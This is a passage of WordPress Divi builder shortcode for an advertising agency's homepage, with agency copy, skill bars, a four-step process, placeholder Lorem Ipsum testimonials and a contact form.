text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"|auto|2px|auto||\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" title_text=\"800x800 w\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x400.jpg\" title_text=\"800x400\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"4.5.2\" custom_margin=\"||||false|false\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" title_text=\"800x800..1\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" title_text=\"800x800\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"4.4.9\" background_color=\"#f7f7f7\" custom_padding=\"0px||50px||false|false\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"4.4.9\" custom_padding=\"50px||50px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.1\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Lead/Sales Generation Campaign - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Digital Advertising - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"4.5.2\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/Artboard-4.png\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-Copy-12-1.png\" alt=\"Best Advertising agency\" title_text=\"best-advertising-agency\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"4.5.2\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p>NOBODY READS ADS, PEOPLE READ WHAT INTERESTS THEM &amp; SOMETIME IT\'S AN AD</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px||3px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Easy to start</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-216\">\n<p><strong><em>Just four steps</em></strong></p>\n<p><strong><em></em></strong></p>\n</div>\n<div class=\"lp-element lp-pom-text nlh\" id=\"lp-pom-text-217\">\n<p>We had adopted proven workflow to produce consistent result, but never hesitate to cross the lines and work differently.</p>\n</div>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px|4px|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"01. BRAND AUDIT\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<p style=\"text-align: center;\"><span>Analyzing the brand with all the key parameter (As per operating environment and competition)</span></p>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"02. STRATEGY\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||26px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<p><span>Starting with the summary of the plan, Defining TG, Writing/Creating USP</span></p>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" width=\"100%\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|0px||||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"03. EXECUTION\" use_icon=\"on\" font_icon=\"%%57%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_margin=\"||26px|||\" animation_style=\"fade\" animation_direction=\"bottom\"]<div><span>Creative Development, Setting up the visual identity, implementing the IMC(Integrated Marketing Communication)</span></div>[/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"04. EVALUATION\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" width=\"98.9%\" custom_margin=\"||43px||false|false\" custom_padding=\"||||false|false\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"]<div dir=\"ltr\"><span>The fourth but the most important step is evaluation, adaptation and reporting. To improvise future performance.</span></div>\n<p><span></span></p>[/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Artboard-5-1.jpg\" alt=\"digital marketing agency\" title_text=\"digital-marketing-agency\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"50px||50px|||\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]<p>Best Advertising Is Done By Satisfied Customers. We Believe &amp; Nurture It In Our Business.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"4.5.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"50px||50px||false|false\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" hover_enabled=\"0\" box_shadow_style=\"preset7\" 